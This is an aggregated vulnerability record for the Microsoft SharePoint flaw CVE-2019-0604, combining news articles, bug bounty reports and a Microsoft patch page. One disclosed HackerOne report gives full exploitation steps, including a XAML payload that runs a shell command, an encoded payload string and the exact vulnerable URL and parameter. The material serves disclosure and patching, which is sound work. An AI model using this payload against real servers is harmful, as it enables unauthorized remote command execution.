[Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T19:32:00", "type": "thn", "title": "Microsoft Patch Tuesday \u2014 February 2019 Update Fixes 77 Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604", "CVE-2019-0626", "CVE-2019-0636", "CVE-2019-0676"], "modified": "2019-02-12T19:41:26", "id": "THN:42A0EFDB5165477E18333E9EE1A81D8E", "href": "https://thehackernews.com/2019/02/microsoft-patch-tuesday-february.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core &amp; Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-10-13T18:17:39", "bounty": 0.0, "description": "l00ph0le discovered an endpoint on the Store Development Resource Center site at https://sdrc.starbucks.com/_layouts/15/picker.aspx was vulnerable to a deserialization RCE in Microsoft Sharepoint per CVE-2019-0604.\n\n@l00ph0le \u2014 thank you for reporting this vulnerability, your patience while we applied the patch and for confirming the resolution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-11T20:27:05", "type": "hackerone", "title": "Starbucks: Store Development Resource Center was vulnerable to a Remote Code Execution - Unauthenticated Remote Command Injection (CVE-2019-0604)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-12-12T21:52:55", "id": "H1:536134", "href": "https://hackerone.com/reports/536134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-13T18:15:16", "bounty": 0.0, "description": "**Summary:**\nMicrosoft recently released a patch for CVE-2019-0604. This vulnerability is caused by the Microsoft SharePoint application deserializing untrusted data from a user.\n\nThis means an attacker can send a specially crafted/encoded parameter to a Microsoft SharePoint URL, and it will allow Remote Code Execution or Command Injection on the server.\n\nThis is an in-depth blog post about the vulnerability.\nhttps://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability\n\nThe \u2588\u2588\u2588\u2588 SharePoint site suffers from this vulnerability. The URL for the main site is: https://\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/OrgStruct/StandingGroups/Pages/default.aspx \n\n**Description:**\n\n## Impact\nThe impact is high. Using the steps below an attacker can run any windows command line on the SharePoint server.\n\n## Step-by-step Reproduction Instructions\n\n1. Clone this github repository for the PoC code https://github.com/l00ph0le/CVE-2019-0604.git\n2. Edit the second \"<System:String>/c calc</System:String>\" in t.xml to the command you would like to execute on the windows server. I edited mind to send a ping request to a ubuntu server hosted on the Internet. The final file looks like this:\n\n<ResourceDictionary\nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\nxmlns:System=\"clr-namespace:System;assembly=mscorlib\"\nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n\t<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n\t\t<ObjectDataProvider.MethodParameters>\n\t\t\t<System:String>cmd.exe</System:String>\n\t\t\t<System:String>/c ping cloudbox2.legithost.info</System:String>\n\t\t</ObjectDataProvider.MethodParameters>\n\t</ObjectDataProvider>\n</ResourceDictionary>\n\n3. User \"ConsoleApplication1.exe\" to generate the encoded payload like this:\nc:/>cd c:\\CVE-2019-0604\\ConsoleApplication1\\ConsoleApplication1\\bin\\Debug\\\n\nc:/CVE-2019-0604\\ConsoleApplication1\\ConsoleApplication1\\bin\\Debug\\>ConsoleApplication1.exe c:/CVE-2019-0604/t.xml\n\n4. This will produce an encoded string that begins with \"__\", copy this string.\n\n5. Setup an Interception proxy (BurpSuite). \n\n6. Browse to the vulnerable URL:\nhttps://\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588/OrgStruct/StandingGroups/_layouts/15/picker.aspx?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,%20Microsoft.SharePoint,%20Version=15.0.0.0,%20Culture=neutral,%20PublicKeyToken=71e9bce111e9429c\n\n7. When the \"Picker.aspx\" page loads, click the hour glass in the right hand corner, and stop the request with burp suite. In the request look for the parameter \"ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=\", and set the value to the encoded string you generated with ConsoleAPplication1.exe. Leave the request paused. The string will look something like this:\n\n__bp4b7135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e600160027009700d000a0008700d600c600e6003700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e6002200d000a0008700d600c600e6003700a3008700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c6002200d000a0008700d600c600e6003700a30035009700370047005600d600d30022003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c600960026002200d000a0008700d600c600e6003700a3004400960016007600d30022003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6002200620076004700b300d000a00090006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3002200c40016005700e600360086003400d600460022000200f4002600a6005600360047004500970007005600d3002200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70022000200d400560047008600f6004600e4001600d6005600d3002200350047001600270047002200620076004700b300d000a000900090006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a0009000900090006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d6004600e2005600870056006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a0009000900090006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f2003600020007009600e600760002003600c600f600570046002600f60087002300e200c60056007600960047008600f60037004700e2009600e6006600f6006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a000900090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a00090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b300d000a0006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300\n\n8. Setup a linux box on the internet with tcpdump to list for icmp requests. Using the following command (my network interface is called venet0, yours will be different) :\ntcpdump -nni venet0 -e icmp[icmptype] == 8\n\n9. Allow the request to go through with BurpSuite, the ping command will execute and you will see the ping requests come to you linux server from a source IP address of: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nSee attached video for a walk through of exploitation. Please reach out if you have any additional questions.\n\n## Product, Version, and Configuration (If applicable)\nThe vulnerability affects four versions of SharePoint. So you may have more exposure.\nMicrosoft SharePoint Enterprise Server 2016\t\nMicrosoft SharePoint Foundation 2013 Service Pack 1\nMicrosoft SharePoint Server 2010 Service Pack 2\nMicrosoft SharePoint Server 2019\n\n## Suggested Mitigation/Remediation Actions\nInstall the SharePoint Security Patches Released by Microsoft on March 12th found here:\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604\n\n## Impact\n\nAn attacker could compromise the windows server that SharePoint is running on. This vulnerability will grant command line server access in the context of the user that SharePoint services are running as. Even if a low privileged user is being utilized for SharePoint services, it gives an attacker a foothold for privilege escalation or moving laterally through the network that the SharePoint server resides on.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-10T19:54:33", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution - Unauthenticated Remote Command Injection (via Microsoft SharePoint CVE-2019-0604)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-05-11T16:53:43", "id": "H1:534630", "href": "https://hackerone.com/reports/534630", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-11-28T09:34:10", "description": "None\n## Summary\n\nThis security update resolves a remote code execution vulnerability that exists in Microsoft SharePoint if the software does not check the source markup of an application package. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Microsoft SharePoint Server 2010](<http://support.microsoft.com/kb/2687453>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462184>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update KB 4462184 for the 64-bit version of SharePoint Server 2010](<http://www.microsoft.com/download/details.aspx?familyid=3b5c9aa5-db7c-45d5-be1b-2ef5c52ca223>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: March 12, 2019](<https://support.microsoft.com/en-us/help/20190312>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4461624](<http://support.microsoft.com/help/4461624>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \ncoreserver2010-kb4462184-fullfile-x64-glb.exe| 4E05F1A4B99B6DFE5C177723F0C8369A4B319000| 8695C104A2FA7CC5B5091A500AEFF458FBCF58A3EB3AE40C2F00A546D9C55730 \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2010\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \naccountjoiner.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| accountjoiner.dll| 4.0.2450.49| 199,272| 11-Sep-2018| 06:22 \nacrmset.asx| changesitemasterpage.aspx| | 12,859| 07-Sep-2018| 12:41 \nacsacnt.apx| contentaccessaccount.aspx| | 6,501| 07-Sep-2018| 05:12 \nacscntrl.acx| addcontentsourcecontrol.ascx| | 24,836| 07-Sep-2018| 05:12 \nacset.asx| areacachesettings.aspx| | 10,763| 07-Sep-2018| 12:41 \nactivityfeed.aspx| activityfeed.aspx| | 199| 07-Sep-2018| 05:17 \nactivityinformation.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| activityinformation.sql| | 7,994| 07-Sep-2018| 04:39 \naddbestbet1.aspx| addbestbet.aspx| | 13,538| 07-Sep-2018| 05:12 \naddcs.apx| addcontentsource.aspx| | 11,219| 07-Sep-2018| 05:12 \naddentity1.aspx| addentity.aspx| | 8,933| 07-Sep-2018| 05:12 \naddfeaturedcontent1.aspx| addfeaturedcontent.aspx| | 12,520| 07-Sep-2018| 05:12 \naddfedl.apx| addfederatedlocation.aspx| | 69,245| 07-Sep-2018| 05:12 \naddgroup.asx| cmsslwpaddeditgroup.aspx| | 6,273| 07-Sep-2018| 12:41 \naddkeyword1.aspx| addkeyword.aspx| | 10,121| 07-Sep-2018| 05:12 \naddlink.asx| cmsslwpaddeditlink.aspx| | 18,595| 07-Sep-2018| 12:41 \naddmanagedproperty1.aspx| addmanagedproperty.aspx| | 19,211| 07-Sep-2018| 05:12 \naddnavlk.asx| addnavigationlinkdialog.aspx| | 8,762| 11-Sep-2018| 03:06 \naddrankpromotion1.aspx| addrankpromotion.aspx| | 13,398| 07-Sep-2018| 05:12 \naddshr.apx| addsitehitrule.aspx| | 7,812| 07-Sep-2018| 05:12 \naddsnm.apx| addservernamemappings.aspx| | 12,736| 07-Sep-2018| 05:12 \naddspellcheck1.aspx| addspellcheck.aspx| | 9,798| 07-Sep-2018| 05:12 \naddtype.apx| addfiletype.aspx| | 12,429| 07-Sep-2018| 05:12 \naddusercontext1.aspx| addusercontext.aspx| | 7,723| 07-Sep-2018| 05:12 \nadgalmaattributeinclusionlis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmaattributeinclusionlist.xml| | 3,423| 07-Sep-2018| 04:39 \nadgalmadata.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmadata.xml| | 53,984| 07-Sep-2018| 04:39 \nadgalmamandatoryattributelis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmamandatoryattributelist.xml| | 2,738| 07-Sep-2018| 04:39 \nadgalmamandatoryobjectclassl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmamandatoryobjectclasslist.xml| | 229| 07-Sep-2018| 04:39 \nadgalmaobjectclassinclusionl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmaobjectclassinclusionlist.xml| | 254| 07-Sep-2018| 04:39 \nadgalmvdata.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| adgalmvdata.xml| | 88,941| 07-Sep-2018| 04:39 \nadmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admaattributeinclusionlist.xml| | 1,551| 07-Sep-2018| 04:39 \nadmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admamandatoryattributelist.xml| | 53| 07-Sep-2018| 04:39 \nadmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admamandatoryobjectclasslist.xml| | 120| 07-Sep-2018| 04:39 \nadmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admaobjectclassinclusionlist.xml| | 206| 07-Sep-2018| 04:39 \nadmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| admapropertypages.dll| 4.0.2450.49| 223,856| 11-Sep-2018| 06:22 \nadministratorsettingssection.ascx| administratorsettingssection.ascx| | 5,375| 07-Sep-2018| 04:31 \nadminlistcontrol1.ascx| adminlistcontrol.ascx| | 4,252| 07-Sep-2018| 05:12 \nadsearch.aspx| advancedsearchlayout.aspx| | 17,270| 07-Sep-2018| 05:12 \naduisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| aduisettinginit.xml| | 595| 07-Sep-2018| 04:39 \nadvanced_aspx| advanced.aspx| | 16,244| 07-Sep-2018| 05:12 \nadvsfast_aspx| advanced.aspx| | 286| 07-Sep-2018| 05:12 \nadvsrch_aspx| advanced.aspx| | 286| 07-Sep-2018| 05:12 \naform1.apx| formsauthenticationproxypage.aspx| | 2,723| 07-Sep-2018| 05:12 \nallitems.asx_multilang| allitems.aspx| | 3,452| 11-Sep-2018| 03:11 \nallitems.asx_xlatelist| allitems.aspx| | 3,453| 11-Sep-2018| 03:11 \nanavset.asx| areanavigationsettings.aspx| | 18,265| 07-Sep-2018| 12:41 \nantixsslibrary.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| antixsslibrary.dll| 2.0.0.0| 33,808| 07-Sep-2018| 04:39 \nareatemp.asx| areatemplatesettings.aspx| | 23,952| 07-Sep-2018| 12:41 \nareawel.asx| areawelcomepage.aspx| | 7,643| 07-Sep-2018| 12:41 